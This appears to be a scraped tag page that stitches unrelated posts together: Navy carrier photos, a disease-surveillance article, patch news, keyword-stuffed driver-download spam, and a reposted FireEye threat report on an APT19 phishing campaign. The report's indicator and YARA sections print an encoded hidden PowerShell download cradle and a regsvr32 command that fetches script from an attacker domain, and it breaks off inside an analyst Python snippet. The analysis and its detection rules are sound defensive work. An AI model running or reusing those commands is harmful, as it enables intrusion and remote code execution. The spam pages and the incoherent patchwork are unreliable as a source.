#cve-116
carbone14 · 1 year ago
An F4U-4 Corsair of Marine Fighter Attack Squadron VMFA-212 sits on the catapult, ready for launch from the escort carrier USS Badoeng Strait (CVE-116) for a strike on Korea – Korean War – 1952
Photographer: Gerald Haddock
©US Navy National Museum of Naval Aviation - 1996.253.7154.010
usaac-official · 8 months ago
A group of VF-1E FR-1s in flight with their piston engines shut down, 1947. The squadron was assigned to USS Badoeng Strait (CVE-116) for testing
usafphantom2 · 2 years ago
A Grumman AF-2S (killer...no radome), comes aboard USS Badoeng Strait (CVE-116).
Just get a load of that wing span!
Search light on the left wing (also possible combined sonobuoy pod), and APS-31 radar on right wing.
@AncientSubHunter via X
nuadox · 1 year ago
Cases of chikungunya and zika fall in Brazil, but most risk clusters exhibit an upward trend
- By Julia Moióli , Agência FAPESP -
Analysis of occurrence and co-occurrence patterns shows the highest-risk clusters of chikungunya and zika in Brazil spreading from the Northeast to the Center-West and coastal areas of São Paulo state and Rio de Janeiro state in the Southeast between 2018 and 2021, and increasing again in the Northeast between 2019 and 2021.
In Brazil overall, spatial variations in the temporal trends for chikungunya and zika decreased 13% and 40% respectively, but 85% and 57% of the clusters in question displayed a rise in numbers of cases. 
These findings are from an article published in Scientific Reports by researchers at the University of São Paulo’s School of Public Health (FSP-USP) and São Paulo state’s Center for Epidemiological Surveillance (CVE) who analyzed spatial-temporal patterns of occurrence and co-occurrence of the two arboviral diseases in all Brazilian municipalities as well as the environmental and socio-economic factors associated with them.
Considered neglected tropical diseases by the Pan American Health Organization (PAHO/WHO), chikungunya and zika are arboviral diseases caused by viruses of the families Togaviridae and Flaviviridae respectively, and transmitted by mosquitoes of the genus Aedes. Case numbers of both diseases have risen worldwide in the last decade and expanded geographically: chikungunya has been reported in 116 countries and zika in 92, according to the Centers for Disease Control and Prevention (CDC), the main health surveillance agency in the United States. Some 8 million people are estimated to have been infected worldwide, although the number may have reached 100 million in light of generalized underreporting of neglected tropical diseases.
The emergence and re-emergence of chikungunya and zika are facilitated by environmental factors such as urbanization, deforestation and climate change, including droughts and floods. “Identifying high-risk areas for the spread of these arboviruses is important both to control the vectors and to target public health measures correctly,” said Raquel Gardini Sanches Palasio, corresponding author of the article. She is affiliated with FSP-USP’s Department of Epidemiology, where she is a researcher in the Laboratory for Spatial Analysis in Health (LAES).
Working with her PhD thesis advisor, Francisco Chiaravalloti Neto, and other researchers at USP and CVE, Palasio analyzed more than 770,000 cases (608,388 of chikungunya and 162,992 of zika) diagnosed by laboratory test or clinical and epidemiological analysis; most were autochthonous (due to locally acquired infection). The analysis encompassed spatial, temporal and seasonal data, as well as temperature, rainfall and socio-economic factors.
The results showed that high-risk areas had higher temperatures and identified co-occurrence clusters in certain regions. “In the first few years of the period the high-risk clusters were in the Northeast. They then spread to the Center-West – zika in 2016 and chikungunya in 2018 – and to coastal areas in the Southeast – in 2018 and 2021 respectively – followed by resurgence in the Northeast,” Palasio said. 
“Spatial variations in the temporal trends for chikungunya and zika decreased 13% and 40% respectively, but numbers of cases rose in 85% and 57% of the clusters concerned. Spatial variation clusters with a growing internal trend predominated in practically all states, with annual growth of 0.85%-96.56% for chikungunya and 2.77%-53.03% for zika.
“We also found that both diseases have occurred more frequently in summer and fall in Brazil since 2015. Chikungunya is associated with low rainfall, urbanization and social inequality, while zika correlates closely with high rainfall and lack of basic sanitation.”
Both are also more frequent in urban areas with less vegetation, she said, adding that socio-economic factors appear to correlate less with zika than with chikungunya.
Next steps 
“Both diseases have the same vectors and are similar in some other ways, so theoretically they should occur in the same places. We didn’t observe perfect overlapping in space and time, however,” Palasio said.
A hypothesis raised by the researchers who conducted the study, which was funded by FAPESP, relates to socio-economic factors, environment and climate. The main source of data was the 2010 census, and next steps will include an update using fresh data from IBGE’s 2022 census.
“We also want to perform a spatial and temporal analysis using a broader dataset that takes socio-economic factors and climate [especially temperature and rainfall] into account together rather than separately,” Palasio said.
Another focus will be co-occurrence or overlapping of the two diseases. Future climate change models will be run under best-case and worst-case scenarios for greenhouse gas emissions.
The article “Zika, chikungunya and co-occurrence in Brazil: space-time clusters and associated environmental-socio-economic factors” is at: www.nature.com/articles/s41598-023-42930-4.
Image: Analysis of spatial variations in temporal trends for cases of chikungunya (A) and zika (B) in Brazil between 2015 and 2022. Credit: Scientific Reports.
This text was originally published by FAPESP Agency according to Creative Commons license CC-BY-NC-ND.
digitalcreationsllc · 2 years ago
Google Patches Chrome Zero-Day Reported by Apple, Spyware Hunters
Google on Monday released an emergency Chrome 116 security update to patch the fourth zero-day vulnerability discovered in the browser in 2023. Tracked as CVE-2023-4863 and rated ‘critical severity’, the bug is described as a heap buffer overflow issue in the WebP component. WebP is an image format that provides improved compression and quality compared to the well-known JPEG and PNG formats,…
airmanisr · 3 years ago
Vought F4U Corsair by Willard Womack Via Flickr: U.S. Navy and Marine ordnance personnel load Marine F4U "Corsair" fighter bombers with rockets and napalm bombs aboard the USS BADOENG STRAIT (CVE-116) off the coast of Korea.
ourforgottenwars-blog · 6 years ago
The U.S. Navy escort carrier USS Badoeng Strait (CVE-116) underway off Korea, operating Vought F4U Corsairs of Marine Fighter Squadron 212 (VMF-212). 13th January 1952.
cddrita · 3 years ago
Download zend studio 9.0.3
DOWNLOAD ZEND STUDIO 9.0.3 PDF
DOWNLOAD ZEND STUDIO 9.0.3 INSTALL
Trojan/Backdoor - JS.Scob.Trojan/Download. Trojan/Backdoor - MyDOOM/NoVarg Detection Trojan/Backdoor - W32/Bagle Virus Detection PVS PLUGIN FAMILIES COUNT FAMILY NAME 100 For more information regarding PVS, please visit: This information includes a brief description, plugin ID, CVE cross-reference, Bugtraq ID cross-reference, Nessus cross-reference, and several other descriptive entries.
DOWNLOAD ZEND STUDIO 9.0.3 PDF
Finally, the PDF details specific information for each of the different plugin modules.
DOWNLOAD ZEND STUDIO 9.0.3 INSTALL
Initially, you have this introduction followed by an overview of plugin count for each plugin family. This article is now available in our new knowledge base: Download and install Zend Server for IBM i Issue This article provides some basic tips to help you find, download, and install Zend Server. This PDF is organized into several sections. This PDF is automatically generated as new plugins are made available for download from the Tenable Network Security Corporate Web Server. Passively determining the type of operating system of each active host.Detecting which ports are served and which ports are browsed for each individual system.Tracking exactly which systems communicate with other internal systems.Highlighting all interactive and encrypted network sessions.Detecting when an internal system begins to port scan other systems.Detecting when new hosts are added to the network.Detecting when an application is compromised or subverted.Keeping track of all client and server application vulnerabilities.There is a branded version of Eclipse called Zend Studio but it is pretty expensive. A single PVS sensor can be placed in front of a network of 25,000 systems and continuously monitor the traffic for a variety of security related information including: As i have download the Eclipse PHP Development Tools (PDT) but its a separate eclipse studio only, but i want to use it from my already installed eclipse. As PVS monitors your network, it also watches for potential application compromises, trust relationships, and open or browsed network protocols. The PVS vulnerability monitor can find out what is happening on your network without actively scanning it. Do you know what happens between the last time a vulnerability scan is completed and the next time a scan is completed? New hosts, new ports, new services, and new vulnerabilities can arrive on your networks faster than you may be allowed to scan for them. Introduction PVS is a passive vulnerability scanner. 
Table of Contents Family Web Clients.158 Family Web Servers.216 Family Abuse.290 Family Policy.291 Family Data Leakage.299 Family SCADA.308 Family Mobile Devices.318 Family Internet Services.327 Table of Contents Introduction.1 PVS PLUGIN FAMILIES.2 Family Backdoors.4 Family CGI.8 Family Database.45 Family DNS Servers.61 Family Finger.65 Family FTP Servers.66 Family FTP Clients.71 Family Generic.73 Family Operating System Detection.106 Family IMAP Servers.113 Family Internet Messengers.116 Family IRC Clients.122 Family IRC Servers.124 Family Peer-To-Peer File Sharing.125 Family POP Server.128 Family RPC.130 Family Samba.133 Family SMTP Clients.136 Family SMTP Servers.146 Family SNMP Traps.154 Family SSH.155 Passive Vulnerability Scanner (PVS) Signatures
noticias-enable · 4 years ago
July 15, 2021
International
Critical Microsoft Security Updates
Updates to patch at least 116 security vulnerabilities in Windows operating systems and related software. At least four of the vulnerabilities are under active attack. Thirteen of the vulnerabilities are rated "critical", meaning they can be exploited by malware or remote attackers to take control of a vulnerable system without any help from the user. Another 103 of the security holes could, if exploited, result in a compromise of the confidentiality, integrity or availability of user data.
Among the critical bugs is, of course, the official fix for the PrintNightmare print spooler flaw in most versions of Windows (CVE-2021-34527), which led Microsoft to release an incomplete patch a week ago in response to exploit code that was accidentally made available online. That patch appears to have caused several problems for Windows users.
Domain Controllers (Active Directory) are particularly exposed, since an attacker who has previously compromised a user's workstation can ultimately obtain rights and privileges at the "domain administrator" level.
Microsoft also fixed six vulnerabilities in Exchange Server, which has been besieged by attackers all year. Satnam Narang, staff research engineer at Tenable, noted that while Microsoft says two of the Exchange bugs addressed this month (CVE-2021-34473 and CVE-2021-34523) were addressed as part of its April 2021 security updates, both CVEs were somehow omitted from that release and are being added now. That is, if you already applied the large batch of Exchange updates Microsoft made available in April, your Exchange systems are protected against these flaws.
Source
midcenturyblog · 8 years ago
80-G-441735 by National Museum of the U.S. Navy (https://www.flickr.com/photos/127906254@N06/)
80-G-441735: USS Badoeng Straits (CVE-116), 1952. Carl, Janet, and Carol Wilbur (left to right) are overjoyed upon the return of their father Lieutenant Commander Carl E. Wilbur onboard while the ship pulls in at Naval Air Station, San Diego, California. Official U.S. Navy Photograph, now in the collections of the National Archives. (2017/11/01). Photograph is extremely curved.
usaac-official · 3 years ago
An AF-2S of VS-37 lands aboard USS Badoeng Strait (CVE-116), 1 April 1954
usafphantom2 · 3 years ago
U.S. Navy Ryan FR-1 Fireball launches from the flight deck of the escort carrier USS Badoeng Strait (CVE-116), March-June 1947.
Ronnie Bell
en.wikipedia.org/wiki/Ryan_FR_Fireball
Via Flickr
actualdriversshopy4f-blog · 5 years ago
DOWNLOAD INTEL CENTRINO WIRELESS N130 DRIVER
Downloads: 2544 File Version: 218101005 Price: Free Download Type: http Uploader: Sally File Size: 23 Mb File Name: intel centrino wireless n130 driver Date Added: 14 November, 2019 File Format: exe Operating Systems: Windows NT/2000/XP/2003/2003/7/8/10 MacOS 10/X
What's New: - Fixes Compaq(intel centrino wireless n130 driver Compaq) Presario 2800 Series power management issue that caused a "blue screen" error. - Bug Fixes -(intel centrino wireless n130 driver -) [SMB]: Modified to deal with a Samba programming vulnerability (CVE-2017-7494). - Fixed Start recording and plug-out SD Card, Recording icon don't disappered. - Fixes LED charging indicator does not work on AC mode. - Fixed when changing the Scan storage option from ‘off’ to ‘on’, the scanning will start immediately instead of doing so on the next boot. - Fixes(intel centrino wireless n130 driver Fixes) a "blue screen" event with code 116 that occurs when running a screen saver overnight if the the notebook is in Extended Desktop mode. - Fixed Issues: - Some color corruption seen in Adobe Premiere Pro with 10 bit pixel format has been fixed. - Fixes shutdown problem in(intel centrino wireless n130 driver in) Win 2000. - Antivirus:(intel centrino wireless n130 driver Antivirus:) - Fixed the bug where the update dialog box could not close when updating the components from the antivirus options page. - Fixed the Intel Lan show "!" after wake up from s3/s4/s5 It is highly recommended to always use the most recent driver version available. Users content: DNS request from local IPv6 will be relayed to IPv4 DNS server, if no IPv6 DNS server is provisioned from ISP. Add Access Point mode 4. Added IPS mode in the setting of Screen Brightness. Upgrade mydlink agent to v2.0.20-b09 to fix the notification issue. Mirco ATX Form Factor; 24.3cm x 22.0 cm It is highly recommended to always use the most recent driver version available. Overlay Theater Mode - Supported, initially off * Control Panel – NoTheaterModeNOTE:Removes "Theater Mode" radio button. - To support FSB1333 CPU+DDR2 667 memory. History - Windows 8.1 has been added as a supported OS. - Windows 7 has been added as a supported OS. - Windows 8 has been added as a supported OS. 
Update Skylake CPU Microcode to revision C2 and Kabylake CPU Microcode to revision 84. (For CPU security update)2. If the newest NAS Navigator2 is not installed on your PC, the message "Unknown error occurred" may appear after the firmware update. DOWNLOAD DVD WRITER MODEL SH-S203B DRIVER Supported OS: Windows Server 2008 Windows 8 Windows XP 64-bit Windows 2000 Microsoft Windows 8.1 (64-bit) Windows Vista 64-bit Microsoft Windows 8 (64-bit) Windows Vista 32-bit Windows Server 2003 32-bit Notebook 8.1/8/7 32-bit Microsoft Windows 8.1 Pro (32-bit) Windows Server 2012 Microsoft Windows 8 Pro (32-bit) Windows 8.1/8/7/Vista 32-bit Windows XP 32-bit Windows 7 32-bit Microsoft Windows 8 Enterprise (32-bit) Windows Server 2008 R2 Windows Server 2016 Notebook 8.1/8/7 64-bit Microsoft Windows 10 (64-bit) Windows Server 2003 64-bit Windows Server 2012 R2 Microsoft Windows 10 (32-bit) Windows 8.1 Microsoft Windows 8 Enterprise (64-bit) Windows 7 64-bit Windows 7 Microsoft Windows 8.1 Enterprise (32-bit) Microsoft Windows 8 (32-bit) Microsoft Windows 8.1 Pro (64-bit) Windows 8.1/8/7/Vista 64-bit Windows 10 Microsoft Windows 8.1 Enterprise (64-bit) Microsoft Windows 8.1 (32-bit) Microsoft Windows 8 Pro (64-bit) Searches: intel centrino wireless n130 driver for Windows XP 64-bit; intel centrino wireless n130 driver for Microsoft Windows 8 (32-bit); intel centrino wireless n130 PXQBF6019; n130 wireless driver intel centrino; intel centrino wireless n130 Pav601-ave; intel centrino wireless n130 PX6019; intel centrino wireless n130 driver for Microsoft Windows 8.1 Enterprise (32-bit); intel centrino wireless n130 driver for Windows 2000; intel centrino wireless n130 P PX601-6; intel centrino wireless n130 driver for Windows Server 2012; intel centrino wireless n130 P60a Compatible Devices: Samsung; Memory Card; Gadget; Ipod; Usb Cables; Wifi adapter To ensure the integrity of your download, please verify the checksum value. 
airmanisr · 6 years ago
Grumman TBM-3 Avenger BuNo 53800 'SK 416' of VS 25 by Batman_60 Via Flickr: over the escort carrier Badoeng Strait (CVE 116) on March 15, 1950.
DOWNLOAD AZFIN AZF3328 SOUND CARD DRIVER
File Format: exe File Size: 23 Mb File Name: azfin azf3328 sound card driver Date Added: 10 December, 2019 Operating Systems: Windows NT/2000/XP/2003/2003/7/8/10 MacOS 10/X Price: Free Downloads: 5381 Uploader: Star File Version: 818121783 Download Type: http
News: - Fixes issue where hot key display switching did not "remember" the resolution. - Fixed the issue where(azfin azf3328 sound card driver where) the internal temperature monitor did not work when the PC reboots or recovers from hibernation mode. - Fixed(azfin azf3328 sound card driver Fixed) some Large Hard Drive can not be detected issueIt is highly recommended to always use the most recent driver version available. - Fixed(azfin azf3328 sound card driver Fixed) errors with parameters whose Data Type is PhTmplt (such as Caller Sel X Caller and Ring X Caller). - Fixed an issue in which T38 fax failed. - Fixed issue: ATK service can't(azfin azf3328 sound card driver can't) restart after stop it. - Fixed some 266 FSB CPU ghost fail. - Fixed(azfin azf3328 sound card driver Fixed) an issue that might have a blue screen error (Bugcheck code 116) when the DVI was used. - Fixes a phenomenon in which the EF Cinema lens' F number was incorrectly displayed. - Fixed watchdog function fail when overclock by Table. - Fixed VPN server related issues. Users content: Known Issues - Specific workstation build information may not be visible in FirePro Settings within the System > Software tab. Confirm your choice by clicking OK Profiles and Modes when exported will now only contain active Actions and Lighting items assigned to a key or a group of keys. As a work around please disable AMD Crossfire for the games profile in the Radeon Settings Gaming tab. Installation Notes:- This custom firmware can be applied like any regular update. Hz / 1920 x 1080 @ 60 Hz - Supports DVI with max. - Added support for ThinkPad X130e. - Update Express Gate to v1.4.6. Added the ability to search (or filter) on the signature ID or text found in the signature description, like a CVE number. Therefore, if you want to install this bundle, click the download button and apply the package. 
https://realdriverscloudz69.wordpress.com/2020/03/28/download-dell-qle2460-driver/ Supported OS: Notebook 8.1/8/7 64-bit Microsoft Windows 8.1 Enterprise (32-bit) Windows Server 2008 R2 Windows 10 Windows 8.1/8/7/Vista 64-bit Microsoft Windows 8.1 (64-bit) Microsoft Windows 8 (64-bit) Windows Server 2003 64-bit Microsoft Windows 8 Pro (64-bit) Windows 7 64-bit Windows Server 2016 Windows 2000 Windows Server 2003 32-bit Microsoft Windows 8.1 Pro (64-bit) Windows XP 32-bit Microsoft Windows 8 Enterprise (32-bit) Microsoft Windows 8.1 (32-bit) Microsoft Windows 8.1 Pro (32-bit) Microsoft Windows 8 Pro (32-bit) Microsoft Windows 10 (64-bit) Windows Server 2012 Windows 7 Windows 8 Windows 8.1/8/7/Vista 32-bit Microsoft Windows 8 (32-bit) Windows Vista 64-bit Windows 8.1 Notebook 8.1/8/7 32-bit Windows XP 64-bit Windows Server 2012 R2 Microsoft Windows 10 (32-bit) Windows 7 32-bit Windows Vista 32-bit Microsoft Windows 8.1 Enterprise (64-bit) Windows Server 2008 Microsoft Windows 8 Enterprise (64-bit) Searches: azfin azf3328 sound card driver for Microsoft Windows 10 (32-bit); azfin azf3328 sound card driver for Windows Server 2012 R2; azfin azf3328 sound card driver for Windows Server 2003 32-bit; card sound azfin azf3328 driver; azfin azf3328 sound card MOJQA9820; azfin azf3328 sound card driver for Notebook 8.1/8/7 32-bit; azfin azf3328 sound card M98q; azfin azf3328 sound card M MO982-9; azfin azf3328 sound card driver for Microsoft Windows 8 Pro (64-bit); azfin azf3328 sound card MO9820; azfin azf3328 sound card Mqm982-qmp Compatible Devices: Hard Drive; Samsung; Keyboards; Iphone; Usb Cables; Printer To ensure the integrity of your download, please verify the checksum value.
terabitweb · 6 years ago
Original Post from FireEye Author: Ian Ahl
Summary
In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.
APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.
As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.
The purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.
The Emails
APT19 phishing emails from this campaign originated from sender email accounts from the “@cloudsend[.]net” domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.
The Attachments
APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.
RTF Attachments
Through the exploitation of the HTA handler vulnerability described in CVE-2017-0199, the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.
Figure 1: RTF PCAP
XLSM Attachments
The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to “Enable Content”, which would enable macro support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).
Figure 2: Enable macros
One of the malicious XLSM attachments that we observed contained a macro that:
Determined the system architecture to select the correct path for PowerShell
Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique used by Meterpreter stagers.
Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).
Figure 3: XLSX Macro
Figure 4 contains the decoded output of the encoded text.
Figure 4: Decoded ZLIB + Base64 payload
The shellcode invokes PowerShell to issue an HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers.
Figure 5: GET Request with minimal HTTP headers
Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.
Figure 6: Decoded shellcode
FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.
Figure 7: Alternate macro
This macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in Figure 8.
Figure 8: Application Whitelisting Bypass
The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.
Figure 9: SCT contents
Figure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike payload.
Figure 10: Decoded SCT contents
A quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar network indicators, shown in Figure 11.
Figure 11: $var_code to ASCII
Second Stage Payload
Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload, configured with the following parameters:
Process Inject Targets:
%windir%\syswow64\rundll32.exe
%windir%\sysnative\rundll32.exe
c2_user_agents
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
Named Pipes
\\%s\pipe\msagent_%x
beacon_interval
60
C2
autodiscover.2bunny[.]com/submit.php
autodiscover.2bunny[.]com/IE9CompatViewList.xml
sfo02s01-in-f2.cloudsend[.]net/submit.php
sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
C2 Port
TCP/80
Figure 12 depicts an example of a BEACON C2 attempt from this payload.
Figure 12: Cobalt Strike BEACON C2
FireEye Product Detections
The following FireEye products currently detect and block the methods described above. Table 1 lists the current detection and blocking capabilities by product.
| Detection Name | Product | Action | Notes |
|---|---|---|---|
| SUSPICIOUS POWERSHELL USAGE (METHODOLOGY) | HX | Detect | XLSM Macro launch |
| Gen:Variant.Application.HackTool.CobaltStrike.1 | HX | Detect | XLSM Macro launch |
| Malware Object | HX | Detect | BEACON written to disk |
| Backdoor.BEACON | NX | Block* | BEACON Callback |
| FE_Malformed_RTF | EX/ETP/NX | Block* | RTF |
| Malware.Binary.rtf | EX/ETP/NX | Block* | RTF |
| Malware.Binary | EX/ETP/NX | Block* | RTF |
| Malware.Binary.xlsx | EX/ETP/NX | Block* | XLSM |
Table 1: Detection review
*Appliances must be configured for block mode.
Recommendations
FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:
Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already installed it.
Search historic and future emails that match the included indicators of compromise.
Review web proxy logs for connections to the included network based indicators of compromise.
Block connections to the included fully qualified domain names.
Review endpoints for the included host based indicators of compromise.
Indicators of Compromise
The following section provides the IOCs for the variants of the phishing emails and malicious payloads that FireEye has observed during this campaign.
Email Senders
PressReader
Angela Suh
Ashley Safronoff
Lindsey Hersh
Sarah Roberto sarah.roberto@cloudsend[.]net
noreply@cloudsend[.]net
Email Subject Lines
Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
Macron Document Leaker Releases New Images, Promises More Information
Are Emmanuel Macron’s Tax Evasion Documents Real?
Time Allocation
Vacancy Report
china paper table and graph
results with zeros – some ready not all finished
Macron Leaks contain secret plans for the islamisation of France and Europe
Attachment Names
Macron_Authenticity.doc.rtf
Macron_Information.doc.rtf
US and EU Trade with China and China CA.xlsm
Tables 4 5 7 Appendix with zeros.xlsm
Project Codes – 05.30.17.xlsm
Weekly Vacancy Status Report 5-30-15.xlsm
Macron_Tax_Evasion.doc.rtf
Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
lyncdiscover.2bunny[.]com
autodiscover.2bunny[.]com
lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
lyncdiscover.2bunny[.]com/Autodiscover
autodiscover.2bunny[.]com/K5om
sfo02s01-in-f2.cloudsend[.]net/submit.php
sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
tk-in-f156.2bunny[.]com
tk-in-f156.2bunny[.]com/Agreement.doc
104.236.77[.]169
138.68.45[.]9
162.243.143[.]145
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)
Host Based Indicators (HBI)
RTF MD5 hash values
0bef39d0e10b1edfe77617f494d733a8
0e6da59f10e1c4685bb5b35a30fc8fb6
cebd0e9e05749665d893e78c452607e2
XLSX MD5 hash values
38125a991efc6ab02f7134db0ebe21b6
3a1dca21bfe72368f2dd46eb4d9b48c4
30f149479c02b741e897cdb9ecd22da7
BEACON and Meterpreter payload MD5 hash values
bae0b39197a1ac9e24bdf9a9483b18ea
1151619d06a461456b310096db6bc548
Process arguments, named pipes, and file paths
powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("")
regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll
\pipe\msagent_<4 digits>
C:\Documents and Settings\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original GET request)
Yara Rules
rule FE_LEGALSTRIKE_MACRO {
    meta:
        version = ".1"
        filetype = "MACRO"
        author = "[email protected] @TekDefense"
        date = "2017-06-02"
        description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
    strings:
        // OBFUSCATION
        $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
        $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
        $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide
        $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
        $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
        $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
        $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide
        $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
        $obreg1 = /(\w{5}\s&\s){7}\w{5}/
        $obreg2 = /(ChrW\(\d{1,3}\)\s&\s){7}/
        // wscript
        $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
        $wsobj2 = "Obj.Run " ascii wide
    condition:
        // not a PE file
        (uint16(0) != 0x5A4D)
        and
        (
            (all of ($wsobj*) and 3 of ($ob*))
            or
            (all of ($wsobj*) and all of ($obreg*))
        )
}
rule FE_LEGALSTRIKE_MACRO_2 {
    meta:
        version=".1"
        filetype="MACRO"
        author="[email protected] @TekDefense"
        date="2017-06-02"
        description="This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file 3a1dca21bfe72368f2dd46eb4d9b48c4."
    strings:
        // Setting the environment
        $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
        $env2 = "windir = Environ(\"windir\")" ascii wide
        $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
        // powershell command fragments
        $ps1 = "-NoP" ascii wide
        $ps2 = "-NonI" ascii wide
        $ps3 = "-W Hidden" ascii wide
        $ps4 = "-Command" ascii wide
        $ps5 = "New-Object IO.StreamReader" ascii wide
        $ps6 = "IO.Compression.DeflateStream" ascii wide
        $ps7 = "IO.MemoryStream" ascii wide
        $ps8 = ",$([Convert]::FromBase64String" ascii wide
        $ps9 = "ReadToEnd();" ascii wide
        $psregex1 = /\W\w+\s+\s".+"/
    condition:
        (
            (
                (uint16(0) != 0x5A4D)
            )
            and
            (
                all of ($env*) and 6 of ($ps*)
                or
                all of ($env*) and 4 of ($ps*) and all of ($psregex*)
            )
        )
}
rule FE_LEGALSTRIKE_RTF {
    meta:
        version=".1"
        filetype="MACRO"
        author="[email protected]"
        date="2017-06-02"
        description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
    strings:
        $header = "{\\rt"
        $lnkinfo = "4c0069006e006b0049006e0066006f"
        $encoded1 = "4f4c45324c696e6b"
        $encoded2 = "52006f006f007400200045006e007400720079"
        $encoded3 = "4f0062006a0049006e0066006f"
        $encoded4 = "4f006c0065"
        $http1 = "68{"
        $http2 = "74{"
        $http3 = "07{"
        // 2bunny.com
        $domain1 = "32{\\"
        $domain2 = "62{\\"
        $domain3 = "75{\\"
        $domain4 = "6e{\\"
        $domain5 = "79{\\"
        $domain6 = "2e{\\"
        $domain7 = "63{\\"
        $domain8 = "6f{\\"
        $domain9 = "6d{\\"
        $datastore = "\\*\\datastore"
    condition:
        $header at 0 and all of them
}
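The $ob1 to $ob8 strings in FE_LEGALSTRIKE_MACRO are the macro's ChrW(n) & ChrW(n) concatenation of the regsvr32 command listed above. The following Python is an added analyst example, not FireEye's code: it decodes such chains back to text, approximates the rule's condition in Python for triage outside YARA, and runs both on a constructed macro body (not a real sample) that splices three of the fragments.

```python
import re

# ChrW(n) & ChrW(n) & ... chains, as used by $ob1..$ob8 in FE_LEGALSTRIKE_MACRO.
CHRW_RE = re.compile(r"ChrW\((\d{1,3})\)")

# The eight fragments, copied verbatim from the rule above.
OB_FRAGMENTS = [
    "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)",
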